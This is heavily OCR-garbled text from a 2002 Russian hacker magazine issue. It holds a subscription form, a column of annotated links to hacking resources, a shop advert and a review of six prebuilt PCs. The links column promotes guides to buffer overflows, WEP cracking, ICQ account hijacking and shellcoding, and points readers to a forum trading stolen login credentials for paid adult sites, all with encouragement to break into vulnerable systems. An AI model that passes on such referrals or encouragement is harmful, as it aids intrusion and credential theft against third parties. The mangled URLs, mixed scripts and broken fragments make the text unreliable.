БОНУС! 


При оформлении годовой под- 
писки на 2003 год - 2 свежих 
номера в подарок!!! 

При оформлении подписки на 
1-е полугодие 2003 года - один 
журнала в подарок!!! 


ВНИМАНИЕ! 


Подписка производится с 
номера, выходящего через 
один календарный месяц 
после оплаты. Например, 
если вы производите оплату в 
Сентябре, то подписку можете 
оформить с ноября. 


Подписка оформляется на 
любой срок. 


СПРАВКИ 
по электронной почте 
subscribe_xs@gameland.ru 
или по тел. (095)292-3908, 
292-5463 


Открыта 
редакционная 


ПОДПИСКА! 


Прошу оформить подписку на журнал "ХакерСпец" 


YO0sr, Е Ш ЕЕ Е Е 9; ee eb 9 


{месяцы) 


(отметьте квадраты, соответствующие календарным месяцам выхода журнала, 
которые вы хотели бы получить) 


Ф.И.О. 
Город/село ул. 
Дом корп. KB.. код тел. 
Сумма оплаты 
Подпись Дата е-тай: 
Копия платежного поручения прилагается. 
Е SS eS ae ae et ee ee Sa ae ee eS ane ЕЕ ey ae >2 =a 
ИНН 7729410015 ООО"ГеймЛэнд" 
Извещение ЗАО «Международный Московский Банк», г. Москва 
р/с №40702810700010298407 
к/с №30101810300000000545 
БИК 044525545 
Плательщик 
Адрес (с индексом) 
Назначение платежа Сумма 
Оплата журнала "ХакерСпец" 
за 200_г. 
Кассир Подпись плательщика 


ИНН 
ЗАО 


7729410015 


«Международный Московский Банк», г. Москва 


ООО"ГеймЛэнд" 


р/с №40702810700010298407 
к/с №30101810300000000545 
БИК 044525545 


Плательщик 


Адрес (с индексом) 


Назначение платежа Сумма 
Оплата журнала "ХакерСпец" 


за 


200 г 


Квитанция 


Подпись плательщика 


Кассир 


наНОг2ЧнаНОг2 


А инфы, как всегда, горы, и поди по- 
пробуй найти среди огромных про- 
сторов Интернета именно то, что тебе 
нужно... Чтобы хоть немного облег- 
чить твои поиски, я попытался подо- 
брать для тебя некоторые полезные 
ссылочки, изучив их, надеюсь, тебе 
станет проще жить в этом сложном 
мире электронной информации %). 


HTTP://GIPSHAGK.RU/TEXT/ 
EXPLT.PHP 

Начнем сегодня с линка для самых Ma- 
леньких :). Если ты плохо знаком с ли- 
нухом, но, узнав, что это такое, сразу 
бросился качать килотоннами экс- 
плойты, то эта небольшая статейка бу- 
дет тебе весьма полезна. Автор лю- 
безно рассказал, как пользоваться 


шеллом и откуда растут ноги у компи- 


лятора, и что нужно вводить для полу- 
чения заветного гООГа. 


НТТР://НАСК.СОМ.ЦА/АРТ/ 
BOF.HTML 

XOTb сегодня у нас и тема легкого Xa- 
ка, но этот ресурс не совсем попада- 
ет под эту категорию - огромный до- 
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кумент, рассказывающий о таком ти- 
пе атак, как переполнение буфера. 
Но не подумай, что это очередной 
дешевый фак, типа тыкни сюда, на- 


вии вси 


= —— 


4 Rafter Overflow Stacy 
Ce 


eet 5 ны 


жми это, и будет то-то. Здесь расска- 
зывается про основы адресации 
прог в памяти и по какому принципу 
происходит это самое переполне- 
ние. Присутствует большое количе- 
ство схем и исходников программ на 
С для изучения теории. Большое 
внимание уделено твоему, надеюсь, 
любимому пингвиненку - с какой 
стороны враг может влиться в твои 
секретные порты и что нужно, чтобы 
избежать этого, как секьюрно скон- 
фигурить ядро системы и много чего 
еще полезного можно узнать из это- 
го текстовичка. К сожалению, дока 
на буржуинском, но, вооружившись 
переводчиком, вполне можно по- 
нять, о чем идет речь, зато если ты 
проникнешься идеями из талмуда, то 
влегкую сможешь устраивать всячес- 
кие Ообы, не прибегая к базе за- 
юзанных эксплойтов. 


Frozen (Тгохеп@геа1.хаКер.ги) 


HTTP://HACK.COM.UA/ARTI- 
CLE.PHP?STORY=2001042 
0113736501 


В последнее время беспроводные ce- 
ти получили достаточно большое рас- 
пространение из-за их удобства и 
практичности. Но вся шняжка заклю- 
чается в том, что радиоволны может 
поймать любой - была бы антенна для 
приема, поэтому люди придумали за- 
щиту в виде шифрования сигнала, но, 
прочитав материал по линку выше, ты 
поймешь, как кодируется сигнал, что 
нужно, чтобы его расшифровать (опи- 
сывается стандарт WEP, использую- 
щийся в протоколе 802.11), каким об- 
разом передается инфа и как всунуть 
вместо исходных данных свои. Так что 
после внимательного изучения атака 


на сеть, организованную без всяких 
там витых пар и прочих коаксиалов, 
не составит для тебя особого труда и 
пройдет гладко, как по маслу. 


НТтТР://М/М/М/.ТРАМЕГРАТА. ЮЦ/ 
NEW/INDEX.PHP 


Ты всегда мечтал поиметь кучу паролей 
от платных порносайтов? И тебе нео- 


хота запариваться над исследованием 
сайта на дыры и последующего взло- 
ма? Или просто хочется получить отве- 
ты на несметное множество вопросов 
касательно поломки баз с пассворда- 
ми? Тогда я могу предложить тебе про- 
гуляться на этот форум - огромное ко- 
личество сообщений, постоянно об- 
новляющаяся база новых логинов на 
доступ к мембровским разделам на 
ХХХ-сайтах должны тебя сильно пора- 
довать, тем более, что получить доступ 
к форуму можно, всего лишь заполнив 
небольшую форму регистрации. 


HTTP://BTGREW.NM.RU/ 
XTEXTS/ICQ_ 4.HTM 
Простенько и со вкусом - статья про 
то, как сломать тетю Асю или по- 
иметь... хм... короткий номер от 
инет-пейджера. Несколько интерес- 
ных и, что самое главное, простых 


способов по этой проблеме могут те- 
бе помочь при поиске элитного циф- 
росочетания или восстановления за- 
бытого пароля. В принципе, автор мог 
бы рассмотреть и более новые спосо- 
бы поломки последних версий дан- 
ной проги, но все-таки у многих еще 
стоит старая версия ICQ (например, у 
нас в локальной сети есть свой ICQ 
сервер, который работает только со 
старыми версиями, правда тут пропа- 
дает необходимость взлома...). 


HTTP://XAKEPLIBRARY.BOOM.R 
и/СТАТИСТАТИТ O9.HTML 


Талмудик про хак практически всего, 
что плохо лежит, и, что приятнее все- 
го, про хак без напряга. Тут ты най- 
дешь, как сломать все ту же бедную 


Асю, просочиться сквозь железную 
дверь с кнопочками аКа домофон, как 
попытаться поломать сайт через осли- 
ка, как бедокурить в чатах и еще мно- 
го всего интересного. Конечно, ста- 
тейка попахивает пылью, но, Как ока- 
залось, в сети существуют еще боль- 


шие тучи дырявых сервантов и глюч- 
ных, кривых сайтов, которые без тру- 
да можно нагнуть :) и на полную 
пользовать в свое удовольствие. 


HTTP://WWW.VOID.RU/? DO =PR 
INTABLE&ID=658 
HTTP://WWW.NVKZ.KUZBASS.N 
ET/GAZZZETA/HTM/145.HTM 


Если ты хочешь узнать, как же все-та- 
ки работает сниффер, то вбивай быс- 
трее этот линк в свою бродилку и впи- 
тывай инфу. Рассказ о том, что же это 
вообще такое, и объяснение работы 
на простеньком примере должны пол- 
ностью развеять все твои вопросы по 
работе этих маленьких нюхачей. К то- 
му же в конце статьи прилагается не- 
большой исходник на сях под линукс, 


так что ты даже сам сможешь напи- 
сать простенькую npory-sniffer, чтобы 
изучить и понять основы перехвата 
чужого трафика, на практике исполь- 
зуя конкретный пример. 


HTTP://HACK.DTORS.NET/ 

Всегда хочется стать великим мегагу- 
ру хака и повелителем компов всего 
мира, но, однако, как обычно, это сла- 
бо удается из-за недостатка инфы. В 
данной статье (шеллкодинг 1 и 2) 
можно получить информацию о со- 
здании скриптов на шелле, рассмат- 


и 


ИНФА 


риваются основные базовые приемы 
и способы кодинга. Но не подумай, 
что тут тебе станут втирать про алго- 
ритмы и прочую пургу - оставь это 
школьным учителям информатики, 
здесь ты поймешь, что значат всякие 
непонятные циферки в скачанных ис- 
ходниках для получения root’a и как 
пишутся эксплойты на примере со- 
здания небольшой проги. Текстови- 
чок на аглицком, но это тебя пугать не 
должно, ведь есть адрес 
http://www.translate.ru/rus/, вбив 
который в твоего любимого ослика, 
ты получишь вполне сносный перевод 
статейки на рюсский :). 


HTTP://WWW.SECURITYLAB.RU/ 
7ID=337462 

Поуправлять каким-нибудь сервером 
- это мечта большинства сетевых кса- 
кепов, долго и упорно бьющихся над 


получением наконец-таки аккаунта с 
неограниченными полномочиями. Эта 
статья рассказывает, как организует- 
ся удаленное управление на основе 
винтукея с помощью терминального 
сервиса; в принципе, основное на- 
правление для админов, но кто меша- 
ет тебе использовать информацию в 
своих «добрых» целях ;). Автор пыта- 
ется провести анализ, каким спосо- 
бом лучше всего защитить соедине- 
ние с сервером, но также и указывает 
на обычные ошибки при подключе- 
нии или использовании разных про- 
грамм для создания консоли управле- 
ния. Поэтому почитать данный мате- 
риал будет весьма интересно не толь- 
ко админам, но и «обычным» пользо- 
вателям сети :). = 
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(095) 928-6089, (095) 928-0360, (095) 928-3574 
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ИНТЕРНЕТ-МАГАЗИН 
ЗАКАЗЫ ПО ИНТЕРНЕТУ — КРУГЛОСУТОЧНО! 
Аа E-MAIL: sales@e-shop.ru 
(WestWood) (Bungie) Halo: ЗАКАЗЫ MO ТЕЕЛЕОНУ МОЖНО СДЕЛАТЬ С 10.00 ДО 21.00 БЕЗ ВЫХОДНЫХ 
ee ce ter The Fall of Reach ТЕЛЕФОНЫ: 928-6089, 928-0360, 928-3574 
Е МЫ ПРИНИМАЕМ ЗАКАЗЫ НА ЛЮБЫЕ АМЕРИКАНСКИЕ ИГРЫ! 


Pewter Figure (GDI) 


Apek Universal 
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ТЕСТИРОВАНИЕ 
СИСТЕМНЫХ 


test_lab (test_lab@gameland.ru) 


Ha родине водки и бурых медведей самосбор компов из комплектухи 
— весьма распространенное явление. Мы недавно задались вопро- 
сом: "А почему?". Не от того ли, что юзеры у нас шибко продвинутые 
и предпочитают собирать свой комп самостоятельно? Bpag ли... Бы- 
ло бы здорово, если бы так и было, но в реальной жизни мы видим, 
что людей, желающих приобрести комп, но не могущих собрать его 
самостоятельно очень много. Тем не менее, очень многие из них не 
покупают уже готовый, собранный комп в магазине, а обращаются к 
своим более опытным знакомым, возвращаясь опять же к самосбору. 
Что же не так? Сборщики обманывают своих клиентов, комплектуя 
готовые системники некачественным железом? Вполне вероятно, 
что многие мелкие конторы так и делают, но почему до сиих пор нет 
большого, надежного, проверенного, узнаваемого, зарекомендовав- 
шего себя русского бренда, который собирал бы качественные ком- 
пы по разумным ценам? Мы решили протестировать те системные 
блоки от сборщиков, которые сейчас имеются на нашем рынке. И 
знаешь что? Их оказалось не так ужи много! Обязательным условием 
участия в тесте было ограничение на цену - не дороже $800, и таких 
машин к нам попало всего шесть... 


Внешнуй вид 


Первое, на что прежде всего обращает внимание потенциальный по- 
купатель при выборе системного блока - это его внешний вид. Так 
вот особой красотой корпус Apek Universal не отличается, дизайн его 
выполнен в строгих тонах, без всяких излишеств. Кнопки на систем- 
нике тонкие, прямоугольной формы, но никаких неудобств с включе- 
нием или перезагрузкой компа не возникает. 


Аомплектация 


Корпус - Inwin $500-1; 

Блок питания - 300W (Apollo); 

Материнская плата - Gigabyte 8IEXP (18457); 
Процессор - Pentium 4 1800 Мгц (Socket 478); 
Оперативная память - Kingston DDR 512 MB; 


Жесткий диск - Seagate Barracuda АТА IV 60 GB; 

Видеокарта - Gigabyte ATI Radeon 9000 Pro 64 MB DDR DVI/TV-OUT; 
DVD-ROM Toshiba (16x/48x); 

FDD. 


december/12/2002 


БЛОКОВ 


Оперативной памяти хватит для 
большинства существующих про- 
грамм, а ее именитый производи- 
тель (Kingston) гарантирует ее 
стабильную работу. Кстати, раз- 
нообразному софту и игрушкам 
будет где разместиться на винче- 
стере в 60 СВ. За видео отвечает 
карточка от Gigabyte на чипе ATI 
Radeon 9000 Pro. По производи- 
тельности, она, конечно, не впе- 
реди планеты всей, но для не са- 
мых крутых игрушек ее потенци- 
ала хватит на довольно продол- 
жительное время. А вот удоволь- 
ствие от просмотров фильмов DVD 
(поэтому DVD-ROM Toshiba весьма 
не лишний) можно получить в 
полной мере. 


Иачество CBOpPKU 


Первое, что бросается в глаза при 

открытии этого корпуса - большое количество свободного места. Все 
провода и шлейфы аккуратно подвязаны, что гарантировало бы хоро- 
шую циркуляцию воздуха (а значит и хорошее охлаждение), но вот 
незадача - посадочные места под системные кулеры пустуют. Так что 
придется либо покупать и устанавливать самому дополнительные 
вентиляторы, либо понадеяться на "авось" и оставить все как есть. На 


процессоре же установлен "боксовый" кулер Pentium 4, что гаранти- 


рует ему довольно прохладную жизнь. Блок питания на 300 W должен 
успешно справляться с обеспечением должного питания всех девай- 
сов, благо их не так много. Особенно огорчает, правда, отсутствие хо- 
рошей звуковой карты, т.к. звук, встроенный в материнскую плату 
удовлетворит лишь босса какого-нибудь офиса, закупившего для сво- 
их ленивых сотрудников эти системники. 


ХАРАКТЕРИСТИКИ ЧИПСЕТА 
ATI Radeon 9000 Pro: 


Технология изготовления - 0.15 мкм; 
Тактовая частота - 275 МГц; 

Шина памяти - 128 бит DDR SDRAM; 
Максимальный объем видеопамяти - 128 МБ; 
Тактовая частота видеопамяти - 550 МГц; 
Поддержка AGP 2X, 4X , 8X и Universal АСР 3.0 
(2X/4X/8X); 

Четыре пиксельных конвейера; 

Один текстурный модуль в конвейере; 
Поддержка билинейной, трилинейной 

и анизотропной фильтрации текстур; 
Поддержка полноэкранного сглаживания 
(технология SMOOTHVISION); 

Поддержка пиксельных шейдеров 

(по спецификациям DirectXx8.1); 

Поддержка вершинных шейдеров 

(по спецификациям DirectXx8.1); 

Поддержка технологии HyperZ II; 

Поддержка мультимониторных конфигураций; 
Поддержка технологии HYDRAVISION 
(менеджмент окон и рабочих столов); 

Два RAMDAC с частотой 400 МГц. 


Подключениуе 


Итак, мышка с клавиатурой подсоединены к системнику, кабель от 
монитора воткнут в разъем видеокарты. Включаем комп, следует за- 
грузка Windows - все драйвера к оборудованию установлены как нуж- 
но, что, безусловно, радует. Остается только установить нужный 
софт/игрушки и можно приступать к интенсивной эксплуатации 
мощностей этого системного блока. 


ХАРАКТЕРИСТИКИ Gigabyte 8IEXP: 


Чипсет - Intel 845E; 

Размеры платы - 305х245 мм. 

Разъемы памяти - 3 DDR SDRAM; 

Слоты расширения - AGP/6 PCI/CNR; 

Порты ввода/вывода - 2 COM/LPT/2 PS/2/6 USB 
2.0/3 IEEE1394; 

Изменение частоты FSB (от 100 до 355 МГц с 
шагом 1 МГц); 

Настройки таймингов памяти; 

Изменение напряжения ядра процессора, шины 
АСР и памяти; 

Системный мониторинг. 


ISM Master 


Внешний Bug 


Аомплектация 


Корпус - Codegen 4046; 

Блок питания - 300W (Codegen); 

Материнская плата - ASUS P4S533 (SiS 6450Х); 
Процессор - Pentium 4 2400 Мгц (Socket 478); 
Оперативная память - Samsung DDR 256 МВ (два модуля по 128 MB); 
Жесткий диск - Maxtor D740X-6L 40 GB; 

Видеокарта - ASUS V8170 64 MB/TV (GeForce 4 440 MX); 
DVD-ROM NEC DV5800; 

CD-RW NEC DR-9100A; 

TV-Tuner Genius Wonder Pro III 

FDD. 


Дизайн этого системника отличается правильными формами co 
стильными металлическими вставками, так что его будет не стыдно 
разместить где-нибудь на видном месте. Кнопки на нем Довольно 


ТЕСТИРОВАНИЕ СИСТЕМНЫХ БЛОКОВ 


удобные, поэтому включать/вы- 
ключать/перезагружать комп 
можно с комфотром. 


"Начинка" этого системного бло- 
ка оставляет хорошее впечатле- 
ние. Материнские платы от ASUS'a 
не нуждаются в дополнительных 
рекомендациях, a Pentium 4 2400 
Мгц обеспечит достойную произ- 
водительность на долгое время. 

Правда, оперативки на 256 МБ 
может не хватить для серьезного 
софта и игрушек, но при необхо- 
димости всегда можно докупить 
еще один модуль памяти (благо 
еще один разъем на материнской 
плате имеется). Винчестер от 
Maxtor на 40 GB, хотя и не пора- 


ХАРАКТЕРИСТИКИ ASUS P4S533: 


Чипсет - SiS 6450Х; 

Размеры платы - 305х220 мм. 

Разъемы памяти - 3 DDR SDRAM; 

Слоты расширения - АСР/б PCI; 

Порты ввода/вывода - 2 COM/LPT/2 PS/2/6 
USB 1.1; 

Изменение частоты FSB (от 100 до 227 МГц с 
шагом 1 МГц); 

Настройки таймингов памяти и выбор частоты ее 
работы; 

Изменение напряжения ядра процессора и 
памяти; 

Ручное распределение прерываний по слотам; 
Системный мониторинг. 


жает воображение заоблачным объемом, но зато славится своей надеж- 
ностью и производительностью. 

Видеокарточка ASUS V8170 64 MB/TV на чипсете GeForce 4 440 МХ 06- 
ладает достаточной производительностью для большинства гамесов, 
так что поиграться можно будет от души. 

ТВ-тюнер Genius Wonder Pro Ш в какой-то мере может заменить 
телевизор, только вот слишком долго сидеть перед экраном монитора 
мы все же не рекомендуем - здоровье дороже :). Также следует 
отметить два привода в этом системнике. Первый позволит смотреть 
0\У0-фильмы, а второй записывать на болванки всяческое файло. 


Иачество сворку 


После "вскрытия" системного блока нашему взору предстали все его 
внутренности. Кишки - провода и шлефы, на ружу выскочить не пыта- 
лись, т.к. были надежно подвязаны. На процессоре установлен "род- 


Maxtor D740X-6L 40 GB 


Эта модель поддерживает интерфейс Ultra 
АТА/133, обладает скоростью вращения 
шпинделя 7200 грт, а объем буфера составляет 
2 МБ. Все эти "радости" обеспечивают весьма 


достойную производительность. Плотность 
записи составляет 40СВ на пластину, что тоже 
неплохо. Также можно отметить набор 
фирменных технологий - Maxtor Data Protection 
System и Shock Protection System, призванных 
защитить винт от всевозможных неприятностей. 
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ХАРАКТЕРИСТИКИ ЧИПСЕТА 
GeForce 4 440 МХ: 


Технология изготовления - 0.15 мкм; 
Тактовая частота - 270 МГц; 

Шина памяти - 128 бит DDR SDRAM; 
Тактовая частота 

видеопамяти - 400 МГц; 


Два пиксельных конвейера; 

Два текстурных блока на конвейер; 
Поддержка билинейной, трилинейной, анизот- 
ропной фильтрации; 

Поддержка полноэкранного сглаживания; 
Поддержка вершинных шейдеров; 
Поддержка технологии оптимизации 
видеопамяти; 

Поддержка двухмониторных 
конфигураций; 

Аппаратная декомпрессия DVD; 

Два встроенных RAMDAC 

с частотой 350 МГц. 


ной" пентиумовский кулер, что гарантирует ему комфортную жизнь. 
А вот с охлаждением всего системного блока могут возникнуть про- 
блемы, особенно летом. Дело в том, что дополнительных кулеров в 
корпусе не наблюдается, хотя посадочные места для них имеются. Ко- 
нечно, вентиляторы можно поставить и самому, но не каждый юзер 
горит таким желанием. Использование блока питания на 300 W весь- 
ма кстати для такой мощной системы с большим энергопотреблением. 


Подключениуе 


После подключения необходимой периферии нам предстояло запус- 
тить компьютер и посмотреть каков он в деле. Оказалось все не так 
гладко, как хотелось бы. При загрузке Виндов, приводов CD-RW и 
DVD-ROM система не видела. Причем похажая картина наблюдалась и 
в BIOS'e. Тогда главное подозрение пало на ФЕ'шный контроллер, т.к. 
У джамперов на приводах алиби было беспорное - все было установ- 
ленно, как нужно. Подозрения подтвердились, на другом контролле- 
ре винчестер и горемыки-приводы отлично прижились. А в осталь- 
ном, прекрасная маркиза, все хорошо... Этот комп у нас получает 
флажок DISHONOR за нерабочий ШЕ-контроллер. 


TAISU РС (BEST BUY) 


Внешний Bug 


080 Чесетбег/ 12/2002 


Аомплектация 


Корпус - Codegen; 

Блок питания - 250W (Codegen); 

Материнская плата - Chaintech 9EJL Summit (18457); 
Процессор - Pentium 4 2000 Мгц (Socket 478); 


Оперативная память - Samsung DDR 256 MB; 
Жесткий диск - Seagate Barracuda АТА IV 60 GB; 
Видеокарта - Chaintech GeForce 4 Ti 4200 64 МВ DDR; 
CD-ROM Asus (52 max); 

FDD. 


Выглядит этот системный блок вполне 
пристойно. А стильный дизайн, 
плавные формы и удобные кнопки 
могут порадовать как эстетов, так и 
практичных пользователей. 

Выбор сборщиков этого системника 
пал на материнскую плату от 
Chaintech. Ничего плохого про нее 
мы сказать не можем, кроме неболь- 
ших способностей к разгону, поэтому 
продолжаем пристальный осмотр и 
проверку документов :). 

А вот винчестер Seagate Barracuda 
АТА IV на 60 GB не дает ни на грамм 
усомниться в своих высоких характе- 
ристиках. 

Продолжает дело высоких характери- 
стик другой серьезный девайс - 
Chaintech GeForce 4 Ti 4200 64 MB 
DDR. Да, эта видеокарточка будет | 
весьма желанной для многих хард- 
корных геймеров, т.к. скорость и гра- 
фику она обеспечивает на очень вы- 
соком уровне. 


ХАРАКТЕРИСТИКИ ЧИПСЕТА 
GeForce 4 Ti 4200: 


Технология изготовления - 0.15 мкм; 

Число транзисторов - ~63 млн.; 

Тактовая частота - 250 МГц; 

Шина памяти - 128 бит DDR SDRAM; 

Тактовая частота видеопамяти - 444 МГцу 128 
МБ DDR и 500МГц у 64 МБ DDR; 

Четыре пиксельных конвейера; 

Два текстурных блока на конвейер; 

Поддержка билинейной, трилинейной, анизот- 
ропной и сочетания трилинейной и анизотроп- 
ной фильтрации текстур; 

Поддержка полноэкранного сглаживания (муль- 
тисэмплинг 2х, 4x, Quincunx, 4х5); 

Поддержка пиксельных и вершинных шейдеров; 
Поддержка поверхностей высокого порядка (RT- 
Patches); 

Поддержка технологии оптимизации видеопамя- 
ти ( Z Occlusion Culling, Z Compression, Fast 7 
Clear, Memory Precharge); 

Поддержка технологии nFinite FX2; 

Поддержка технологии AccuView; 

Поддержка двухмониторных конфигураций; 
Аппаратная декомпрессия DVD; 

Два RAMDAC с частотой 350 МГц, 


Seagate Barracuda АТА IV 


Внутренности этой рыбки находятся под надеж- 
ной защитой толстых стенок и металлических 
пластин. Правда, из-за такого защитного панци- 
ря Барракуда иногда мучается от повышенной 
температуры, так что ее хозяин должен позабо- 
титься о дополнительном охлаждении. Точно же 
определить температуру позволяет встроенный 
термодатчик. По сравнению с прошлыми рыбка- 
ми, значительно увеличилась плотность треков 
на пластине и записи данных на дорожке - на 
пластине у четвертой Барракуды может быть за- 
писано до 40 ГБ данных. А двигатель SoftSonic 
на гидродинамических подшипниках (Fluid 
Dynamic Bearing - FDB) может разгоняться до 
7200 об/мин, но при этом оставаясь практически 
бесшумным (максимальный уровень шума - 2.4 
Б). Размер буфера в 2 МБ тоже свидетельствует 
о серьезном нраве рыбки. 


А вот оперативку сборщики явно зажлобили - 256 МВ будет узким ме- 
стом у такой мощной системы с 2 ГГ-цовым процом, шустрым винтом 
и быстрой видюхой. 


Иачество CBOpPKU 


Открыв системный блок, ничего ужасного мы не увидели. Напротив, 
все было установлено и подвязано заботливыми руками (следы ног 
мы не заметили :)). Вот только в очередной раз огорчило отсутствие 
дополнительных вентиляторов, что ни есть гуд. Да и блок питания на 
300 W не помешал бы (особенно, если покупатель планирует в даль- 
нейшим заняться его апгрейдом), а так придется довольствоваться 
250-ваттником. 


Подключение 


На этот раз никакие неприятные сюрпризы нас не поджидали. Все уст- 
ройства определилось, как надо и были готовы к продуктивной работе. 
В нашем случае, этой продуктивной работой были популярные тесты. 


ТЕСТИРОВАНИЕ СИСТЕМНЫХ БЛОКОВ 


Аомплектация 


Корпус - MI-636; 

Блок питания - 250W (Power Master); 
Материнская плата - Gigabyte 8ТЕХР (1845Е); 
Процессор - Pentium 4 2260 Мгц (Socket 478); 
Оперативная память - Samsung 256 MB DDR 333; 
Жесткий диск - Maxtor D740X-6L 40 GB; 


Видеокарта - MSI GeForce 4 460 MX TV-In/Out 64 MB; 
Звуковая карта - Creative S.B Audigy 5.1; 

DVD-ROM Pioneer DVD-106S; 

Модем - Zyxel OMNI V90; 

FDD. 


Встречают, как известно, по одежке. Так BOT с 
внешним видом у этого системника не все глад- 
ко. Квадратный гробик с голубой передней па- 
нелью придутся по вкусу либо извращенцам, 
либо другим загадочным личностям :). 


А вот, если заглянуть в душу этого системни- 
ка, то он сразу начинает вызывать симпатию. 
Продвинутая материнка и мощный процессор 
обеспечат солидную производительность в 
ПО и гамесах. Тем более видеокарта MSI с TB- 
входом/выходом на чипе GeForce 4 460 MX 
может удовлетворить довольно многно (и 
сразу :) - прим. ред.) пользователей своим 
качеством графики и приемлемой скоростью. 


Аомплектация 


Жесткий диск от Maxtor D740X-6L на 40 GB вполне удачный выбор 
сборщиков, а вот на оперативную память они поскупились - 256 МВ, 
на сегодняшний день, весьма скромно. Также весьма приятно наблю- 
дать звуковую карту от Creative - 5.В. Audigy 5.1, которая порадует 
своим звучанием и меломанов, и геймееров, и любителей DVD. Благо, 
неплохой DVD-ROM у этого системника имеется, а видеокарта с ТВ-вы- 
ходом позволит вывести изображение на широкий экран телевизора. 
Еще можно отметить неплохой модемчик Zyxel OMNI \90, неплохо за- 
рекомендовавший себя на российских линиях. 


Иачество сворку 


Первое, что стало понятно, при вскрытии этого системника, так это 
фальшивость надписи "ZIP" на лицевой панели корпуса. Внутри 
скрывался обыкновенный флопик, так что будьте бдительны ;). Ав 
остальном придраться практически не к чему, разве что только к пу- 
стым посадочным местам под вентиляторы... 


Подключение 


Как и ожидалось, все оборудование было определено и готово к на- 
шим испытаниям. Осталось только установить необходимые бенчмар- 
ки и оценить быстродействие этого системника. 


ХАРАКТЕРИСТИКИ ЧИПСЕТА 
GeForce 4 460 МХ: 


Технология изготовления - 0.15 мкм; 
Тактовая частота - 300 МГц; 

Шина памяти - 128 бит DDR SDRAM; 

Тактовая частота видеопамяти - 550 МГц; 

Два пиксельных конвейера; 

Два текстурных блока на конвейер; 
Поддержка билинейной, трилинейной, анизот- 
ропной фильтрации; 

Поддержка полноэкранного сглаживания; 
Поддержка вершинных шейдеров; 

Поддержка технологии оптимизации видеопамяти; 
Поддержка двухмониторных конфигураций; 
Аппаратная декомпрессия DVD; 

Два встроенных RAMDAC с частотой 350 МГц. 
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082 


Excimer Family РС Hestia 


Внешний Bug 


Аомплектация 


Корпус - Hestia; 

Блок питания - 175W; 

Материнская плата - MS-6235 (18451); 

Процессор - Pentium 4 2000 Мгц (Socket 478); 
Оперативная память - Samsung DDR 256 MB; 

Жесткий диск - Seagate Barracuda АТА IV 20 GB; 
Видеокарта - MS-8851 GeForce3 Ti 200 128 MB DDR TV, DVI; 
DVD-ROM - Sony DDU1621; 

FDD. 


Выглядит этот системник на фоне осталь- 
ных участников нашего тестирования до- 
вольно необычно, но за счет скромных 
размеров и приятного дизайна вызывает 
симпатию. 

Многие к системникам формата micro-ATX 
относятся предвзято, мол ничего хороше- 
го в такой "коробочек" не впихнешь. Од- 
нако если пристально взглянуть на ком- 
плектацию, то становится понятно, что де- 
вайсы подобрали вполне удачно. Блок пи- 
тания на 175 W оправдан для формата 
micro-ATX. Мамка MS-6235 имеет на борту 
все самое необходимое. 

Видеокарта MS-8851 GeForce3 Ti 200 в не- 
которых позициях даже лучше GeForce 4 
МХ (например, в качестве графики), так 
что ее использование тоже нельзя расце- 
нивать, как экономию сборщиков. 


256 МБ оперативной памяти от Самсунга 
хватит Ha не слишком крутое ПО. Немного 
разочаровал винчестер на 20 ГБ, но ничего страшного, особенно, если не 
планируется создавать большие коллекции видеофильмов и пр3З‘\шек. 


ХАРАКТЕРИСТИКИ MS-6235: 


Чипсет - Intel 8450; 
Размеры платы - 244 x 231 мм. 


Разъемы памяти - 2 DDR SDRAM; 
Слоты расширения - AGP/3 PCI/CNR; 
Порты ввода/вывода - 2 COM/LPT/4 USB 1.1; 
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Иачество CBOpPKU 


Да, в корпусе формата micro-ATX места очень мало, HO в данном слу- 
чае все девайсы разместились без проблем и кучи проводов сверху не 
наблюдалось. Вместо заявленного на коробке с системником обычно- 
го CD-ROM'a, внутри оказался DVD-ROM SONY DDU 1621. Такая "заме- 
на", безусловно, обрадует многих покупателей ;). Также установлен 
дополнительный системный кулер, что весьма кстати, т.к. внутри ма- 
ленького корпуса может быть очень жарко, особенно летом. 


Подключениуе 


При попытке начать загрузку, стало понятно, что система "голая". Поэтому 
пришлось устанавливать свою версию Windows ХР. После установки, прав- 
да, никаких проблем не возникло. Все определилось и работало, как часы. 


Depo Race 348 (OUR CHOICE) 


Внешний Bug 


Строгий классический дизайн корпуса ничем особенным Ha фоне oc- 
тальных конкурентов не выделяется, но и общей картины не портит. 
Кнопки на нем вполне удобные, так что перезагружаться можно бу- 
дет с комфортом :). 


Аомплектация 


MidiTower; 

Блок питания - 300W; 

Материнская плата - Microstar MS-6585 (SiS 648); 
Процессор - Pentium 4 2530 Мгц (Socket 478); 
Оперативная память - DDR 512 MB; 


Жесткий диск - Maxtor (7200) 40 GB; 

Видеокарта - MSI MS-StarForce GeForce4 МХ 440 64 MB DDR; 
DVD-ROM Sony DDU1621; 

FDD; 

Оптическая мышь; 

Клавиатура. 


Строгий классический дизайн корпуса ничем особенным на фоне ос- 
тальных конкурентов не выделяется, но и общей картины не портит. 
Кнопки на нем вполне удобные, так что перезагружаться можно бу- 
дет с комфортом :). 

Комплектация у этого системника весьма приличная. Мамка Microstar MS- 
6585 и папка Pentium 4 2530 Мгц буквально созданы друг для друга :). 
Модуль памяти на 512 МБ тоже здесь не лишний, особенно для такой 
мощной системы. А объема винта на 40 ГБ хватит на долгое время, 
особенно, если не слишком увлекаться коллекционированием видео. 
Видеокарточка MS-StarForce GeForce4 МХ тоже отвечает современным 
требованиям, так что удовольствия от игрушек можно получить по 
полной программе. А DVD-ROM позволит смотреть DVD фильмы. Прав- 
да, еще было бы не лишним обзавестись многоканальной акустикой. 


Иачество CBOPKU 
Качество сборки хорошее. Вот только 
установить дополнительные системные 
вентиляторы очень желательно, благо 
посадочные места под них имеются. Ав 
целом все оставляет благоприятное 
впечатление, а видеокарту даже при- 
держивает дополнительный фиксатор = 
на корпусе, что говорит о заботливых ь 
руках сборщиков :). — в — 


Подключение х = 


Включив системный блок, нас уже через несколько секунд приветст- 
вовала английская версия Windows ХР. Все оборудование было опре- 
деленно и готово к работе, чем мы и воспользовались для интенсив- 
ного тестирования. 


ТЕСТИРОВАНИЕ СИСТЕМНЫХ БЛОКОВ 


ХАРАКТЕРИСТИКИ Microstar MS-6585: 


Чипсет - SiS 648; 
Размеры платы - 305x220 мм; 
Разъемы памяти - 3 DDR SDRAM; 


Слоты расширения - AGP/6 PCI/6 USB; 

Порты ввода/вывода - 2 COM/2 PS/2/6 USB 2.0; 
Изменение частоты FSB; 

Настройки таймингов памяти; 

Системный мониторинг. 


SiSoft Sandra 2002 


В этом популярном бенчмарке лучше всех проявил себя системник 
Depo Race 348, показав действительно высочайшие скорости. Вто- 
